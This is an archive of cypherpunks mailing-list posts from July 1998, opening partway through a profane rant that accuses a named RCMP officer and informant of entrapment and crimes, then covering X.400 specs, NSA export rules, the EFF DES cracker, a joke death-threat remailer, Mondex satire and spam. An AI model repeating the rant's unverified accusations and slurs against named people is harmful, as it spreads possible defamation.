over the head with an axe and taking all of my medication.
  This small bit of self-restraint on his part allowed me to split my
supply of medication into small stashes which I could allow him to find
and steal at a rate suitable for keeping his habit in check, and buy me
time for the temperature to rise to a scorching twenty below zero, at
which time I made a break for a friend's house some distance away, and
suffered only minor frostbite in the process.

  As far as Officer Besalt, RCMP, is concerned, however...Fuck That
Sorry Criminal ScumSucking Piece Of Crap In His Dirty Little Asshole!
  Officer Besalt, too ignorant to realize who was grinding the organ,
and who was dancing with the funny hat and the tin cup, brought Ian
down to Estevan in an attempt to bust me for selling my medication.
  ou see, Ian had been working as an informant for the RCMP in other
Saskatchewan districts, enabling the Mounties to arrest and convict
a number of desperados, some of whose crime seemed to be wanting to
kick Ian's ass for fucking their sisters while being AIDS infested,
without telling them. 
 {In all fairness to the Mounties, Ian's bragging about the people who
  he had screwed over as a police informant indicated that half of them
  were probably guilty of *something*...}

  Thus it was that Ian and his old lady appeared on my doorstep in the
small hamlet of Bienfait, late one night, wanting to purchase some of
my medication. He pulled a wad of money out of his pocket, and seemed
fully prepared to make a buy...

 [Note by AnEditorToBeBustedLater: What it is essential to understand,
  here, is that any individual on the face of the earth, no matter how
  dim-witted, could immediately take one look at Ian, seeing him for
  the first time, and instinctively realize that no matter how desperate
  he was for a fix, even if he had a million dollars in his pocket, he
  would first try every scam in the world to steal whatever drugs a 
  person had before he would finally break down and actually *buy* them
  in an honest, straightforward deal.]

  I stood there looking at the cash in his hand, mentally visualizing
a picture of Dudley DoRight where the Queen's picture normally is, and
immediately came to three quick conclusions:
1) The motherfucker *owed* me for the several hundred dollars that it
took for me to replace my tires and get my motorhome mobile again.
(Not to mention the thousand or so dollars of damage he did to the
 interior while tearing it apart, looking for drugs.)
2) Ian was only holding forth $ 40.00, out of the several hundred in
his possession, obviously intending to purchase a couple of pills,
stash the rest of the money in his sock, and pick up a couple of hundred
bucks in spare change, over and above what the RCMP were paying him to
help frame innocent people.
3) Since Ian was totally incapable of going more than a few hours without
drugs, he undoubtedly had some in his possession (probably provided by
the Dudley DoRight Pharmacutical Company), and that if I didn't do a
deal with him, he might very well stash the forty bucks in my house on
his way out, and turn over a few pills of his private stash as evidence
against me.

  I don't like jail...never have...never will...
  Regardless, there was not a snowball's chance in hell that I was going
to pass up an opportunity to fuck Ian out of forty bucks.
  I snatched the $ 40.00 out of his hand, and said, "OK! I'll meet you
at the CoalDust Saloon in ten minutes. I've got the shit stashed outside."

  Ian knew I was scamming him, but he wasn't sure how. Neither was I, but
I had ten minutes to figure it out...

Basic Rules Of Life #238:
If your's is the strength of ten, because your heart is pure, and you are
working for the Forces of Light...never pull your scams in a dark alley.
Dark alleys are for criminals, and the criminal with the badge and the
gun invariably win the battle.

Basic Rules Of Life #239:
Criminals are afraid of the light...even criminals with badges and guns.
"Sunshine is the best disinfectant." ~ Judge Louis Brandeis


  I went to the CoalDust Saloon, and used one of the twenties to buy a
beer for myself and Ian. Ian wanted me to give him the drugs, and I told
him to hold on for a minute.
  I walked over to the change machine by the Video Lottery Terminals and
put the other twenty and the beer change in, turning them into loonies.
I gave Ian ten of the Loonies.
  I proceeded to put the rest of the Loonies into a VLT machine and begin
gambling.

  Ian asked me where the drugs were. I told him to fuck off. He looked
hurt and hung around like a kicked puppy, while his old lady made a call
on the pay phone.
  Officer Besalt walked through the door of the CoalDust Saloon a few
minutes later.

[eah, yeah, it's me again: The RCMP cover a lot of territory in a thinly
 populated area, around Estevan, and thus it takes them a considerable 
 amount of time to respond to calls. It may take them several hours to
 respond to a traffic accident, or thirty minutes to an hour to respond 
 to serious crimes late at night. If they walk through the door five
 minutes after being called, it is because they were sitting around
 the corner, and waited for four minutes before getting out of their
 vehicle and coming in.]

  Officer Besalt needed to get the Mountie's DrugFrontMoney back while
pretending it was Ian's money.
  Lottsa luck...

  We discussed the situation, as I sat playing the VLT, and I quite simply
told the OffalSir that Ian had offered me money to buy drugs from me and
that I had taken it, since he owed me hundreds of dollars for having 
slashed my tires in order to hold me hostage and steal my drugs in Regina.
  Unfortunately, I didn't use the word 'taken.' I told OffalSir Besalt
that I had 'snatched' the money from Ian's hand, whereupon both Besalt
and I knew that he was now free to fuck with me if I did not return the
money, since I had implied that Ian might not have relinquished the money
totally voluntarily.
  Although I was between a rock and a hard place, not having the money,
there *is* a Dog! I hit a minor jackpot that gave me forty bucks.

  As I waited for the barmaid to cash in my ticket and bring me the money,
I made a point of going into great detail, loud enough for everyone nearby
to hear, about how the person on whose behalf the RCMP Officer was shaking
me down was a drug addict who was attempting to make a drug buy from me,
and how I was unwilling to commit the crime, desiring only to receive the
money that he owed me for slashing my tires and holding me hostage in
severe winter conditions in the BigCity.
  "Sunshine is the best disinfectant."

The Bottom Line:
  OffalSir Besalt is a sorry, scumbag Nazi piece of shit with no better
morals or conscience than to try to use a lying, conniving criminal scam-
artist who has provided countless Canadian youth with hard drugs while
working as a paid RCMP agent/informant, to attempt to entrap a mentally
disabled individual into committing a crime by selling his medications
in order to prevent once again being victimized by a lifetime criminal.

  Oh, yeah...and *I* have never murdered anyone by giving them AIDS
while being under the legal protection of the RCMP.

_____________________
Non-Adobe PostScript:
  One of the more humorous aspects of the Ian Wasacase Saga was a news
story in the Regina Leader Post in regard to the RCMP's ultra-secret
informant/witness in the trial of four(?) men accused of armed robbery
(and murder?). 
  After describing the individual's identity being cloaked by his
participation in the Witness Protection Program, the Leader Post, toward
the end of the article, revealed Ian's name.
  Duuhhh...

  Ian is now serving hard time in a Manitoba prison as a result of a
multitude of armed robberies he committed while working under the
protective umbrella of the RCMP.
{Undoubtedly hoping that his cellmates don't have a subscription to
 the Regina Leader Post.}

  Officer Besalt is serving hard time as a result of being trapped in
the mind and body of an Ignorant Nazi Fuck (TM).
{Undoubtedly too fucking ignorant to realize that he would be much better
 off being Ian Wasacase.}

Attention Law Enforcement Agents:
"Smoke 'em if you confiscated 'em..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 21 Jul 1998 03:37:58 -0700 (PDT)
To: "Jia Yan" <yjia@sz.utl.com.hk>
Subject: Re: where...
In-Reply-To: <19980721071954.AAA9474@pc-230>
Message-ID: <199807211036.GAA07241@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <19980721071954.AAA9474@pc-230>, on 07/21/98 
   at 04:25 PM, "Jia Yan" <yjia@sz.utl.com.hk> said:

>Hi:
>	Does anybody can tell me in which ftp site i can find the specifications
> about the CCITT's X.400 and X.500 protocol sets?
>	Thanx!

Well this one was a real bitch to find.

The CCITT is now the ITU: http://www.itu.ch

The Specs are at: http://www.itu.ch/publications/itu-t/itut.htm

The X.400 specs are actually located under F.400 as this spec has been
givien a dual designation of F.400/X.400

Seems that you have to *pay* for a copy of this spec, 39 Swiss Francs,
whatever that is in real money.

X.500 is the same deal but it is only 20 Swiss Francs.

The specs seem to be in postscript, adobe, and word formats. Engilsh,
French, and Spanish versions available.

They are set-up for online ordering and downloading. After you pay you are
given a username and password to download the file(s).

I think if you hunt around the site you may be able to pick up a copy of
all the specs on a CD but no idea what it costs.

Hopw this helps,

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: "640K ought to be enough for anybody." - Bill Gates, 1981

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNbRwoY9Co1n+aLhhAQHMwAP8CUhzUwC1RnUHKH4IWt+x6Qc2cgoLFoe/
9/+mQcG2ai84yQiyCAqjkcDhukBYgCfpEGFNwqrqcMyuofP/PrkaEdjTigCHS7kd
xvm0+mPv9O6CPJCkkvj12/I9iZI5jMXWwmuO3CpQwzcfBgJ/M45UdkZpF8AwvLjz
EN5A3lFhayM=
=WCIU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 21 Jul 1998 02:12:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Thanks, phlamers!
Message-ID: <199807210913.LAA13592@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


     * To: cypherpunks@toad.com
     * Subject: Re: Request To Be Phlamed
     * From: Reeza! <howree@cable.navy.mil>


At 11:53 AM 18 07 98 -0700, GayWeb.Net wrote:
>Hi Guys

GO THE FUCK AWA. NOW.

______________________

I would like to thank all of you who helped to test my new
PresidentialDeathThreatRemailer by sending your flames to
the above address, to be forwarded to the BlancHouse.

[Please note that the PresidentialDeathThreatRemailer logs
and forwards all headers with the messages.]

I put the PresidentialDeathThreatRemailer into operation only
after receiving assurances from Jim Bell's public defender
attorney that I am legally free to help people exercise their
right of free speech in this manner, and that it would not
adversely affect my military career, as long as I was careful
to forward only flames and death threats, while deleting any
pictures of officers fucking the living shit out of non-coms.

All donations to the PresidentialDeathThreatRemailer will be
donated to the IRS Jalapeno Vaseline Fund.

Reezone Ozone





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Jul 1998 08:31:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA's Long Strong Arm
Message-ID: <199807211530.LAA08035@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


>From a series in Network World, July 20, 1998,
"The Long, Strong Arm of the NSA," about the
Agency's methods of enforcing export obedience
with intimidation, delay and obfuscation:

 User manual: Dodging the rules 

 By Ellen Messmer Network World, 

 The National Security Agency (NSA) wrote the export rules 
on encryption. But from the point of view of corporations 
that want to ship U.S. software to their foreign offices, 
getting around the U.S. export rules is a top priority.

 And even for those who used to work at the NSA, it's still 
a challenge.

 "Well, I wrote those export rules when I was at the NSA," 
confessed Russell Davis, now chief of information technology 
security at SBC Warburg Dillon Read, a division of Swiss Bank 
Corp., which operates in 77 countries. Since joining the 
corporate life, Davis has used his knowledge of the NSA to 
find ways to work around the export system on behalf of his 
customer, the bank, which uses a lot of encryption-based 
security gear.

 "It took 17 months to figure out how to get crypto-based 
smart cards to Swiss facilities and elsewhere," Davis said. 
"But I wrote the rules on all this, and I know how to get 
around them." Would he ever consider using government-
approved data-recovery?

 "Never," Davis declared. "My customers come first!"

 "Our customers just aren't going to buy these types of 
products," said Tom Carty, vice president of business 
development for GTE CyberTrust. He agreed the government is 
leading industry down a path to build products few users 
will willingly buy.

---------

More at Network World:

 http://www.nwfusion.com/news/0720nsa.html  (requires sign-up)

Mirror:

 http://jya.com/nsa-lsa.htm

Thanks to MO.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Jul 1998 09:28:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hooray Mondex
In-Reply-To: <199807211516.LAA14338@homeport.org>
Message-ID: <199807211628.MAA31959@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a Chase-Mondex user's report from Manhattan's upper 
west side test bed:

1. We got about 20 of the first cards and sent them around the
globe to crackers. None shared the fruits but a few came back
with requests, see 2 :

2. By special request of sweettalking crackers who had heard 
about the first batch, we got a few more, and knowing these folks
were honest, we loaded the cards with a few bucks from our 
bank account as they asked, "for testing." Days later we were broke.

3. Chase refilled our account and apologized for insufficient
protection from electronic bandits. The bandits sent us 50%
of what they stole: $12.00. Rudely wrote: get a job.

4. Recently, we got two of Citibank's cards with $5.00 each on 
them. Tried for days to get local merchants to take them, none
would because they lacked a unique magnetic stripe they'd
been advised to watch for, which, we later learned, once swiped
could tap into global data banks on the user, clean their
accounts, screw their records, erase the institutionalized mugging, 
leave an audit showing it was the irresponsible military-site 
crackers who did it.

5. We got $5,000,000 digi-cash for that info from SDA, who 
got it from the institutions running the Mondex banditry: 
those ACP recommends the Commerce Department grant 
license exceptions for the export of encryption products of 
any strength that have been determined to be "legitimate 
and responsible."[*]

Happily Legitimate and Responsible

----------

* http://jya.com/acp-dier.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 21 Jul 1998 10:38:10 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 21, 1998
Message-ID: <199807211729.MAA16881@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#0000FF"
SIZE=2>==========================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

A new multi-billion dollar industry is here!

Be at CTIA's WIRELESS I.T. '98
where personal computing and communications
converge!

Don't Miss Your Chance -- October 12-14,
1998
Bally's Las Vegas, Las Vegas, NV

Call 202-785-0081 for more information.
<FONT COLOR="#0000FF"
SIZE=2>===========================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leo <leo@supersex.com>
Date: Tue, 21 Jul 1998 11:10:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: you got that PGP program?
In-Reply-To: <99c9c87.35b3d24d@aol.com>
Message-ID: <Pine.BSF.3.91.980721140449.21072B-100000@lisa.supersex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 20 Jul 1998 LrdWill@aol.com wrote:

> you got it?
> 

Not since the penicillin shots, no.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mla39@gte.net
Date: Tue, 21 Jul 1998 13:46:27 -0700 (PDT)
To: mla39@gte.net
Subject: Put your subject line here
Message-ID: <199807212040.PAA12975@smtp1.mailsrvcs.net>
MIME-Version: 1.0
Content-Type: text/plain


___________________________________________________________
This Message was Composed using Extractor Pro '98 Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.

E-Source is pleased to announce that they are a Channel Parnter with TAVA, developers of the 
Plant Y2KOne Software System.  As a Channel Parnter, E-Source can reduce the costs and the 
risk associated with manufacturing plant conversions for the year 2000.

Visit www.tava.com for a review of the product.  Then contact E-Source directly at mla39@gte.net for a technical visit or review.  We have trained computer engineers ready to assist you on 
Y2K compliance issues.

Mel Arendt
EVP- E-Source
mla39@gte.net 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jia Yan" <yjia@sz.utl.com.hk>
Date: Tue, 21 Jul 1998 01:25:06 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: where...
Message-ID: <19980721071954.AAA9474@pc-230>
MIME-Version: 1.0
Content-Type: text/plain


Hi:
	Does anybody can tell me in which ftp site i can find the specifications
 about the CCITT's X.400 and X.500 protocol sets?
	Thanx!
 
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <"cognitus<KILL SPAM>"@earthlink.net>
Date: Tue, 21 Jul 1998 13:34:04 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: NSA's Long Strong Arm
In-Reply-To: <199807211530.LAA08035@camel8.mindspring.com>
Message-ID: <35B4FBC9.F5E75026@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> >From a series in Network World, July 20, 1998,
> "The Long, Strong Arm of the NSA," about the
> Agency's methods of enforcing export obedience
> with intimidation, delay and obfuscation:

At http://jya.com/nsa-lsa.htm,

the first article is the most interesting. It demonstrates what I have
always believed, that the state's reason for limiting encryption was
mainly to pressure corporations, who are driven by profits, to adopt the
state's desired encryption features. These NSA-approved products from
American corporations should be seen as contaminated, tainted and
poisoned.

Would you purchase hardware or software that meets the government's
export standards--approved by NSA?

"Never," Davis declared. "My customers come first!"


Richard Storey




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 21 Jul 1998 12:38:20 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Donkey Dick: Man tries penis swap with Donkey/Springer's 'love child'
Message-ID: <19980721174201.1221.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/21/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VideAll  USA <info@videall.com>
Date: Mon, 3 Aug 1998 22:04:13 -0700 (PDT)
To: VideoEnthusiast@egret.prod.itd.earthlink.net
Subject: Thanks for the visit
Message-ID: <bulk.173.19980721205145@circe.videall>
MIME-Version: 1.0
Content-Type: text/plain


Just a note to thank you for your past visit
to our old aol based website, which presents
the VideAll for video-taping everyone.  Please 
visit our new site at http://www.videall.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 21 Jul 1998 06:50:14 -0700 (PDT)
To: "Corvus Corvax" <corvuscorvax@hotmail.com>
Subject: Re: Requests
In-Reply-To: <19980720203908.28197.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980721224922.0084d980@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 01:39 PM 20 07 98 PDT, Corvus Corvax wrote:
>
>> What some of them seem to want would appear to be _me_ (and you).
>
>Only because you'd look so absolutely luscious in leather, darling. 
>
>Kiss kiss, 
>
>Diva! von Future Prime
>

 Luscious in leather is something nice, 
 BUT:
 "Luscious" does not suit me.

Lusty, vigorous and virile, perhaps, but not luscious.

<duck>
DID YOU SEE THAT?
IT was FREE SPEECH! On a UFO~!

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CompSec01@aol.com
Date: Wed, 22 Jul 1998 10:08:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tempest computers
Message-ID: <4da466f2.35b58852@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


If you would like information about tempest monitors, computers, printers or
secure fax machines, please contact me.

Tempest tecnology prohibits the electronic monitoring of electromagnetic
emissions from the above listed devices.  This is the core of our business.
Sincerely,
Karen Azoff
Computer Security Solutions, Inc.
6190 Grovedale Ct.,#200
Alexandria, VA  22310 ph. US 703 922-0633 fax US 703 922-0963
email; kte4mpest@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ZeroInt.at.birmingham.crosswinds.net (ZeroInt)
Date: Wed, 22 Jul 1998 10:21:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (fwd) Topic is Internet server stalkers AKA Cyberpunks
Message-ID: <35bb70fa.5628631@mail.zebra.net>
MIME-Version: 1.0
Content-Type: text/plain


Thought this might be of interest.

On Tue, 21 Jul 1998 12:40:48 -0500, in misc.survivalism "~The Seventh
Sign~" <Higuy&Galswhatsup@the.com> said:

>Nobody important wrote<Snipped the bullshit>
>
>Hello people I will address this in an off topic way to many of you but you must learn about the
>type of individual we have been dealing with.
>
>1.)Has plenty of time on his hands and may be something else in his had is you catch my drift.
>2.)Thinks it is a cool thing to try to shut down servers and hack into systems. Use to have his own
>web site but not now.
>3.)Has use of library computers so he thinks he won't get caught.
>4.)Mad at his Dad for not being there for him. Making him made at the world.
>5.)Has been posting sollog crap trying to shut down servers that burned him.
>6.)Thinks 'Archangle'(A well known name in the hackers sites.) is his mentor.
>7.)Has probably send hate mail to you and other members of the group using the anonymous remailers
>rigging the response to finger the other member of the group.
>
>
>Who's servers is he trying to shut down you ask.
>www.theasi.com (Hacking (Don't get your info here a page cost you $9.95USA), sollog and other
>bullshit)
>www.theeunderground.net Ditto the above!
>www.replay.com Anonymous remailers that he has been abusing like rubber gloves after hemorrhoid
>surgery. You could send the stuff to abuse@replay.com but I think the little punk wants you to mail
>bomb his account. or you could send your complaints to postmaster@nym.alias.net but you would play
>into the little punks hand like I did.
>
>DEFENSE AGAINST THIS ANTAGONIST IS SIMPLE:
>whatshitten will be his name from this point on.
>Solagged would be good too.
>A profit prophet is what sollog is no predictions have ever come true.
>
>Just take my message and repost it under all of his post thank you!
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ZeroInt.at.birmingham.crosswinds.net (ZeroInt)
Date: Wed, 22 Jul 1998 13:02:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (fwd) Topic is Internet server stalkers AKA Cyberpunks
Message-ID: <35b97056.5464309@mail.birmingham.crosswinds.net>
MIME-Version: 1.0
Content-Type: text/plain


Though this might be of interest

On Tue, 21 Jul 1998 12:40:48 -0500, in misc.survivalism "~The Seventh
Sign~" <Higuy&Galswhatsup@the.com> said:

Nobody important wrote<Snipped the bullshit>

Hello people I will address this in an off topic way to many of you
but you must learn about the
type of individual we have been dealing with.

1.)Has plenty of time on his hands and may be something else in his
had is you catch my drift.
2.)Thinks it is a cool thing to try to shut down servers and hack into
systems. Use to have his own
web site but not now.
3.)Has use of library computers so he thinks he won't get caught.
4.)Mad at his Dad for not being there for him. Making him made at the
world.
5.)Has been posting sollog crap trying to shut down servers that
burned him.
6.)Thinks 'Archangle'(A well known name in the hackers sites.) is his
mentor.
7.)Has probably send hate mail to you and other members of the group
using the anonymous remailers
rigging the response to finger the other member of the group.


Who's servers is he trying to shut down you ask.
www.theasi.com (Hacking (Don't get your info here a page cost you
$9.95USA), sollog and other
bullshit)
www.theeunderground.net Ditto the above!
www.replay.com Anonymous remailers that he has been abusing like
rubber gloves after hemorrhoid
surgery. You could send the stuff to abuse@replay.com but I think the
little punk wants you to mail
bomb his account. or you could send your complaints to
postmaster@nym.alias.net but you would play
into the little punks hand like I did.

DEFENSE AGAINST THIS ANTAGONIST IS SIMPLE:
whatshitten will be his name from this point on.
Solagged would be good too.
A profit prophet is what sollog is no predictions have ever come true.

Just take my message and repost it under all of his post thank you!










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@om.toad.com>
Date: Wed, 22 Jul 1998 10:40:12 -0700 (PDT)
To: John Lowry <jlowry@bbn.com>
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <3.0.3.32.19980720114859.009997f0@dave.bbn.com>
Message-ID: <199807221318.GAA03684@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


> One lesson I plan to observe - don't encrypt known plaintext unless you
> have to !

The EFF DES Cracker cracks more than just known plaintext (though it's
the easy case).  It also cracks plaintexts whose likely byte values
are known (e.g. all alphanumeric), winnowing the keyspace down to a
size that software or humans can search.  Such a search runs in very
close to the time required for an ordinary known-plaintext search.
See the book for details (www.oreilly.com).

We successfully cracked a DES-encrypted Eudora saved-mail file
provided by Bruce Schneier during our debugging period.  He gave us
the top byte of the key so we could focus on debugging rather than on
waiting to get to the right block of keyspace.  The machine located
the key within that 49-bit keyspace after we fixed a few software
bugs.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eureka Daily News <eureka@eureka.abc-web.com>
Date: Wed, 22 Jul 1998 11:27:06 -0700 (PDT)
To: All Eureka! Subscribers: ;
Subject: -> Eureka! Wed Jul 22 '98
Message-ID: <19980722075733.27465.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


<<< No Message Collected >>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Wed, 22 Jul 1998 10:30:05 -0700 (PDT)
To: "John Gilmore" <gnu@om.toad.com>
Subject: RE: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <199807221318.GAA03684@cygint.cygnus.com>
Message-ID: <000801bdb583$b8b736c0$931daace@default>
MIME-Version: 1.0
Content-Type: text/plain


John,
Do you plan on renting out the use of the cracker on a per-key basis and if
so, how much do you anticipate charging for cracking a message?

Thanks,
--Lucky

> -----Original Message-----
> From: e$@vmeng.com [mailto:e$@vmeng.com]On Behalf Of John Gilmore
> Sent: Wednesday, July 22, 1998 6:19 AM
> To: John Lowry
> Cc: Robert Hettinga; gnu@toad.com; cryptography@c2.net;
> coderpunks@toad.com; cypherpunks@toad.com; e$@vmeng.com;
> dcsb@ai.mit.edu; gnu@cygnus.com
> Subject: Re: John Gilmore and the Great Internet Snake Drive
>
>
> > One lesson I plan to observe - don't encrypt known plaintext unless you
> > have to !
>
> The EFF DES Cracker cracks more than just known plaintext (though it's
> the easy case).  It also cracks plaintexts whose likely byte values
> are known (e.g. all alphanumeric), winnowing the keyspace down to a
> size that software or humans can search.  Such a search runs in very
> close to the time required for an ordinary known-plaintext search.
> See the book for details (www.oreilly.com).
>
> We successfully cracked a DES-encrypted Eudora saved-mail file
> provided by Bruce Schneier during our debugging period.  He gave us
> the top byte of the key so we could focus on debugging rather than on
> waiting to get to the right block of keyspace.  The machine located
> the key within that 49-bit keyspace after we fixed a few software
> bugs.
>
> 	John
>
>
> ----------------------------------------------------------------------
> Where people, networks and money come together: Consult Hyperion
> http://www.hyperion.co.uk/                   info@hyperion.co.uk
> ----------------------------------------------------------------------
> Full-Strength Cryptographic Solutions for Worldwide Electronic Commerce
> http://www.c2.net/                                   stronghold@c2.net
> ----------------------------------------------------------------------
> Like e$? Help pay for it!
> For e$/e$pam sponsorship or donations, <mailto:rah@shipwright.com>
> ----------------------------------------------------------------------
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jia Yan" <yjia@sz.utl.com.hk>
Date: Tue, 21 Jul 1998 17:57:00 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: where...
Message-ID: <19980721234852.AAA14790@pc-230>
MIME-Version: 1.0
Content-Type: text/plain


Thank you very much!
but i think i can work out sum better ones with the money. 

----------
> From: William H. Geiger III <whgiii@invweb.net>
> To: Jia Yan <yjia@sz.utl.com.hk>
> Cc: cypherpunks@toad.com
> Subject: Re: where...
> Date: Tuesday, July 21, 1998 6:28 PM
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <19980721071954.AAA9474@pc-230>, on 07/21/98 
>    at 04:25 PM, "Jia Yan" <yjia@sz.utl.com.hk> said:
> 
> >Hi:
> >	Does anybody can tell me in which ftp site i can find the
specifications
> > about the CCITT's X.400 and X.500 protocol sets?
> >	Thanx!
> 
> Well this one was a real bitch to find.
> 
> The CCITT is now the ITU: http://www.itu.ch
> 
> The Specs are at: http://www.itu.ch/publications/itu-t/itut.htm
> 
> The X.400 specs are actually located under F.400 as this spec has been
> givien a dual designation of F.400/X.400
> 
> Seems that you have to *pay* for a copy of this spec, 39 Swiss Francs,
> whatever that is in real money.
> 
> X.500 is the same deal but it is only 20 Swiss Francs.
> 
> The specs seem to be in postscript, adobe, and word formats. Engilsh,
> French, and Spanish versions available.
> 
> They are set-up for online ordering and downloading. After you pay you
are
> given a username and password to download the file(s).
> 
> I think if you hunt around the site you may be able to pick up a copy of
> all the specs on a CD but no idea what it costs.
> 
> Hopw this helps,
> 
> - -- 
> - ---------------------------------------------------------------
> William H. Geiger III  http://users.invweb.net/~whgiii
> Geiger Consulting    Cooking With Warp 4.0
> 
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
> - ---------------------------------------------------------------
>  
> Tag-O-Matic: "640K ought to be enough for anybody." - Bill Gates, 1981
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a-sha1
> Charset: cp850
> Comment: Registered_User_E-Secure_v1.1b1_ES000000
> 
> iQCVAwUBNbRwoY9Co1n+aLhhAQHMwAP8CUhzUwC1RnUHKH4IWt+x6Qc2cgoLFoe/
> 9/+mQcG2ai84yQiyCAqjkcDhukBYgCfpEGFNwqrqcMyuofP/PrkaEdjTigCHS7kd
> xvm0+mPv9O6CPJCkkvj12/I9iZI5jMXWwmuO3CpQwzcfBgJ/M45UdkZpF8AwvLjz
> EN5A3lFhayM=
> =WCIU
> -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 22 Jul 1998 09:53:53 -0700 (PDT)
To: "e$@vmeng.com" <e$@vmeng.com>, "Cypherpunks" <cypherpunks@toad.com>
Subject: FLASH:    Fwd: Modification to ITAR under way: Will it affect crypto too?
Message-ID: <199807221424.KAA02460@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi Cypherpunks.
I fell on that text in the Canadian Firearms Digest, V2 #506 today.
Maybe somebody will want to look into it to see what part of ITAR was modified and if it will affect crypto...

Please feel free to forward to every possibly interested party.

Ciao
jfa


=============================================================
Date: Wed, 22 Jul 1998 06:29:54 -0600
From: Rod Regier <rr@dymaxion.ca>
Subject: US Export controls saga update

(http://www.pmdtc.org/oas.PDF)  indicates that US State Dept. expects
the current exemption of Canada from the ITAR export permit
requirements for firearms and ammunition (and parts thereof)
to be rescinded soon.

When I spoke to a US State Department employee, they indicated they
were being told it is going to happen in a few days.

They gave me a Canadian government employee counterpart contact
information (?Dept of Foreign Affairs?).

I spoke with the Canadian government contact, and was pleasantly
surprised for a change.

I was told that Canada plans to contest this threatened action, since
